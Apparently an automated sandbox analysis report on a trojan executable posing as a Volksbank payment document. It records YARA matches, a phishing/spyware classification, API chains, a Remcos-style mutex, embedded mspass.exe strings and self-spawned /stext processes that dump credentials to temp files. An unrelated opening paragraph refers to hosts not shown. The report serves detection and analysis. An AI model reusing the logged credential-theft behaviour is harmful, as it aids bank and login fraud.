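On the sample rows this leaves www.google.com as the only host seen in the sample's own image or memory and maps.windows.com as seen only in the dropped file; 2_2_0040987A is reported as a clipboard writer and 1_2_02D41207 as the NtProtectVirtualMemory caller, while the NtdllDefWindowProc_W row is not counted as a native call. Feed it the full exported report to get the same split over all rows.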

            E-Banking Fraud

            Source: Yara matchFile source: 00000001.00000002.7799903641.000000000416E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.7799903641.0000000004175000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe PID: 5888, type: MEMORYSTR

            System Summary

            Source: initial sample | Static PE information: Filename: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process Stats: CPU usage > 6%
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 1_2_02D41207 Sleep,NtProtectVirtualMemory
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_00401806 NtdllDefWindowProc_W
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_004018C0 NtdllDefWindowProc_W
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_004016FD NtdllDefWindowProc_A
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_004017B7 NtdllDefWindowProc_A
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 0_2_00403350 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 1_2_34F4B5C1
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_00406E8F
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0044B040
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0043610D
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_00447310
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0044A490
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0040755A
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0043C560
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0044B610
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0044D6C0
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_004476F0
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0044B870
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0044081D
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_00414957
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_004079EE
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_00407AEB
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0044AA80
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_00412AA9
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_00404B74
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_00404B03
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0044BBD8
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_00404BE5
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_00404C76
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_00415CFE
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_00416D72
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_00446D30
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_00446D8B
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_00405038
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_0041208C
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_004050A9
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_0040511A
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_0043C13A
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_004051AB
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_00449300
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_0040D322
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_0044A4F0
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_0043A5AB
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_00413631
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_00446690
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_0044A730
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_004398D8
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_004498E0
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_0044A886
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_0043DA09
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_00438D5E
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_00449ED0
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_0041FE83
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 3_2_00430F54
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: String function: 004169A7 appears 87 times
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: String function: 0044DB70 appears 41 times
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: String function: 004165FF appears 35 times
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: String function: 00422297 appears 42 times
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: String function: 00444B5A appears 37 times
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: String function: 00413025 appears 79 times
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: String function: 00416760 appears 69 times
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000000.00000000.2716525355.00000000007E3000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebirky festivalfolket.exev+ vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000003.3017439948.00000000041D7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000000.2848426380.00000000007E3000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebirky festivalfolket.exev+ vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F2B000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000003.3016057655.00000000041C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000003.2977734651.0000000004196000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Binary or memory string: OriginalFileName vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000000.2978160814.00000000007E3000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebirky festivalfolket.exev+ vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000003.00000000.2978673638.00000000007E3000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebirky festivalfolket.exev+ vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000000.2979186755.00000000007E3000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebirky festivalfolket.exev+ vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.000000000041B000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Binary or memory string: OriginalFilenamebirky festivalfolket.exev+ vs Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@9/14@1/2
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 0_2_00403350 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Code function: 2_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | File created: C:\Users\user\classrooms
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-0V7E34
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | File created: C:\Users\user\AppData\Local\Temp\nss8DEC.tmp
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | System information queried: HandleInformation
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810121195.0000000034E20000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3014339280.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012915497.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012866639.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013029030.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013164901.000000000239E000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013126977.000000000239C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | ReversingLabs: Detection: 36%
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | File read: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_3-33180
            Source: unknown | Process created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\hvglntqjpwxqeafzzxxpsjflkurl"
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\sptdomaclepvggbdihsivorutbiuqfu"
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\cjzw"
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\hvglntqjpwxqeafzzxxpsjflkurl"
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\sptdomaclepvggbdihsivorutbiuqfu"
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Process created: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe" /stext "C:\Users\user\AppData\Local\Temp\cjzw"
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: edgegdi.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: oleacc.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: edgegdi.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: rstrtmgr.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | Section loaded: cryptsp.dll
